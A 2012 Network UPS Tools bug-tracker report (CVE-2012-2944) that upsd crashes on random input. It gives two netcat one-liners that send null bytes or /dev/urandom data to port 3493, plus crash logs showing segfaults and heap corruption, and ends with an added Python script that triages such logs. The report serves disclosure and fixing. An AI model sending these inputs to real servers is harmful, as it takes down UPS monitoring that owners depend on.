[nut-Bugs][313636] upsd crashes if it receives random data
nut-bugs at alioth.debian.org
Tue May 29 21:43:55 UTC 2012
nut-Bugs item #313636, was changed at 29/05/2012 23:43 by Arnaud Quette
You can respond by visiting:
https://alioth.debian.org/tracker/?func=detail&atid=411542&aid=313636&group_id=30602
Status: Open
Priority: 3
Submitted By: Sebastian Pohle (sepo-guest)
Assigned to: Nobody (None)
Summary: upsd crashes if it receives random data
Category: Server
Group: None
Resolution: None
Initial Comment:
It is possible to remotely kill the upsd daemon if you send random data to the port it is listening on.
I've tested it with Debian 6 (nut_2.4.3-1.1squeeze1) and Ubuntu 12.04 (nut-server_2.6.3-1ubuntu1).
Possible commands to reproduce this behavior are:
printf "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\n" | netcat 127.0.0.1 3493
dd if=/dev/urandom count=10 | netcat 127.0.0.1 3493
The error message upsd prints on exit is kind of random. Possible error messages I've seen are:
root@server[/etc/nut]$ upsd -DDDD
Network UPS Tools upsd 2.4.3
0.000000 listen_add: added 127.0.0.1:3493
0.000211 setuptcp: try to bind to 127.0.0.1 port 3493
0.000353 listening on 127.0.0.1 port 3493
0.000726 Connected to UPS [dummy1]: dummy-ups-dummy1
0.001917 mainloop: polling 2 filedescriptors
0.194902 mainloop: polling 2 filedescriptors
0.195057 UPS [dummy1]: dump is done
0.195117 mainloop: polling 2 filedescriptors
0.781194 Connect from 127.0.0.1
0.781240 mainloop: polling 3 filedescriptors
0.781305 Sending error [UNKNOWN-COMMAND] to client 127.0.0.1
0.781373 write: [destfd=6] [len=20] [ERR UNKNOWN-COMMAND]
0.781429 mainloop: polling 3 filedescriptors
0.781477 Sending error [UNKNOWN-COMMAND] to client 127.0.0.1
0.781522 write: [destfd=6] [len=20] [ERR UNKNOWN-COMMAND]
0.781560 Sending error [UNKNOWN-COMMAND] to client 127.0.0.1
0.781599 write: [destfd=6] [len=20] [ERR UNKNOWN-COMMAND]
0.781634 mainloop: polling 3 filedescriptors
0.781676 Sending error [UNKNOWN-COMMAND] to client 127.0.0.1
0.781717 write: [destfd=6] [len=20] [ERR UNKNOWN-COMMAND]
0.781743 Sending error [UNKNOWN-COMMAND] to client 127.0.0.1
0.781779 write: [destfd=6] [len=20] [ERR UNKNOWN-COMMAND]
0.781810 Sending error [UNKNOWN-COMMAND] to client 127.0.0.1
0.781852 write: [destfd=6] [len=20] [ERR UNKNOWN-COMMAND]
0.781894 mainloop: polling 3 filedescriptors
Segmentation fault
root@server[/etc/nut]$ upsd -DDDD
Network UPS Tools upsd 2.4.3
0.000000 listen_add: added 127.0.0.1:3493
0.000324 setuptcp: try to bind to 127.0.0.1 port 3493
0.000586 listening on 127.0.0.1 port 3493
0.001157 Connected to UPS [dummy1]: dummy-ups-dummy1
0.002920 mainloop: polling 2 filedescriptors
0.003184 mainloop: polling 2 filedescriptors
0.003345 UPS [dummy1]: dump is done
0.003471 mainloop: polling 2 filedescriptors
1.889695 Connect from 127.0.0.1
1.889836 mainloop: polling 3 filedescriptors
upsd: malloc.c:3575: mremap_chunk: Assertion `((size + offset) & (mp_.pagesize-1)) == 0' failed.
Aborted
root@server[/etc/nut]$ upsd -DDDD
Network UPS Tools upsd 2.4.3
0.000000 listen_add: added 127.0.0.1:3493
0.000233 setuptcp: try to bind to 127.0.0.1 port 3493
0.000405 listening on 127.0.0.1 port 3493
0.000831 Connected to UPS [dummy1]: dummy-ups-dummy1
0.001926 mainloop: polling 2 filedescriptors
0.159276 mainloop: polling 2 filedescriptors
0.159502 UPS [dummy1]: dump is done
0.159626 mainloop: polling 2 filedescriptors
2.160695 mainloop: no data available
2.160832 mainloop: polling 2 filedescriptors
4.162958 mainloop: no data available
4.163092 mainloop: polling 2 filedescriptors
6.096929 Connect from 127.0.0.1
6.097012 Pinging UPS [dummy1]
6.097075 mainloop: polling 3 filedescriptors
upsd: malloc.c:3097: sYSMALLOc: Assertion `(old_top == (((mbinptr) (((char *) &((av)->bins[((1) - 1) * 2])) - __builtin_offsetof (struct malloc_chunk, fd)))) && old_size == 0) || ((unsigned long) (old_size) >= (unsigned long)((((__builtin_offsetof (struct malloc_chunk, fd_nextsize))+((2 * (sizeof(size_t))) - 1)) & ~((2 * (sizeof(size_t))) - 1))) && ((old_top)->size & 0x1) && ((unsigned long)old_end & pagemask) == 0)' failed.
Aborted
root@server[/etc/nut]$ upsd -DDDD
Network UPS Tools upsd 2.4.3
0.000000 listen_add: added 127.0.0.1:3493
0.000218 setuptcp: try to bind to 127.0.0.1 port 3493
0.000447 listening on 127.0.0.1 port 3493
0.000906 Connected to UPS [dummy1]: dummy-ups-dummy1
0.002018 mainloop: polling 2 filedescriptors
0.002194 mainloop: polling 2 filedescriptors
0.002262 UPS [dummy1]: dump is done
0.002305 mainloop: polling 2 filedescriptors
1.384295 Connect from 127.0.0.1
1.384374 mainloop: polling 3 filedescriptors
1.384616 Sending error [UNKNOWN-COMMAND] to client 127.0.0.1
1.384698 write: [destfd=6] [len=20] [ERR UNKNOWN-COMMAND]
1.384893 Sending error [UNKNOWN-COMMAND] to client 127.0.0.1
1.384980 write: [destfd=6] [len=20] [ERR UNKNOWN-COMMAND]
1.385130 Sending error [UNKNOWN-COMMAND] to client 127.0.0.1
*** glibc detected *** upsd: realloc(): invalid next size: 0x09d46850 ***
======= Backtrace: =========
/lib/libc.so.6(+0x6b19a)[0xb768319a]
/lib/libc.so.6(+0x7093d)[0xb768893d]
/lib/libc.so.6(realloc+0xd7)[0xb7688c17]
/lib/libc.so.6(+0x5f8da)[0xb76778da]
/lib/libc.so.6(fclose+0xc9)[0xb76735b9]
/lib/libc.so.6(__vsyslog_chk+0x186)[0xb76dffe6]
/lib/libc.so.6(syslog+0x27)[0xb76e0457]
upsd[0x804edf4]
upsd[0x804f00f]
upsd[0x804a1d9]
upsd[0x804a436]
upsd[0x804ad08]
/lib/libc.so.6(__libc_start_main+0xe6)[0xb762ec96]
upsd[0x80496c1]
Aborted
----------------------------------------------------------------------
>Comment By: Arnaud Quette (aquette)
Date: 29/05/2012 23:43
Message:
This has been assigned CVE-2012-2944 by MITRE
----------------------------------------------------------------------
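An added triage example (not part of the original report and not NUT code): it scans `upsd -DDDD` output in the format quoted above and, for each daemon run that ends in one of the abort signatures shown in the report, returns the last client that connected and the number of protocol errors sent to each client before the crash. The sample log is constructed and uses documentation addresses; the function name `triage` and the result field names are assumptions.

```python
import re

# Constructed sample, modelled on the debug output format quoted in the report.
SAMPLE = """\
Network UPS Tools upsd 2.4.3
0.781194 Connect from 192.0.2.10
0.781305 Sending error [UNKNOWN-COMMAND] to client 192.0.2.10
0.781477 Sending error [UNKNOWN-COMMAND] to client 192.0.2.10
Segmentation fault
Network UPS Tools upsd 2.4.3
1.889695 Connect from 192.0.2.11
upsd: malloc.c:3575: mremap_chunk: Assertion `(constructed)' failed.
Aborted
Network UPS Tools upsd 2.4.3
2.000000 Connect from 192.0.2.12
2.000100 Sending error [UNKNOWN-COMMAND] to client 192.0.2.12
"""

CONNECT = re.compile(r"^\s*\d+\.\d+\s+Connect from (\S+)")
ERROR = re.compile(r"^\s*\d+\.\d+\s+Sending error \[[A-Z-]+\] to client (\S+)")
FATAL = [  # abort signatures that appear in the report's four runs
    ("segfault", re.compile(r"^Segmentation fault")),
    ("heap-assert", re.compile(r"malloc\.c:\d+: \w+: Assertion")),
    ("glibc-heap-check", re.compile(r"^\*\*\* glibc detected \*\*\*")),
]

def triage(log_text):
    """Return one finding per upsd run that ended abnormally."""
    findings, last_client, errors = [], None, {}
    for line in log_text.splitlines():
        if line.startswith("Network UPS Tools upsd"):
            last_client, errors = None, {}  # banner marks a fresh daemon run
            continue
        m = CONNECT.match(line)
        if m:
            last_client = m.group(1)
            continue
        m = ERROR.match(line)
        if m:
            errors[m.group(1)] = errors.get(m.group(1), 0) + 1
            continue
        for kind, pattern in FATAL:
            if pattern.search(line):
                findings.append({"kind": kind, "last_client": last_client,
                                 "protocol_errors": dict(errors)})
                last_client, errors = None, {}  # avoid double-counting this run
                break
    return findings
```

A run that crashes with zero protocol errors logged, as in the second sample run, still produces a finding, so the connecting client is not lost when the daemon dies before it answers.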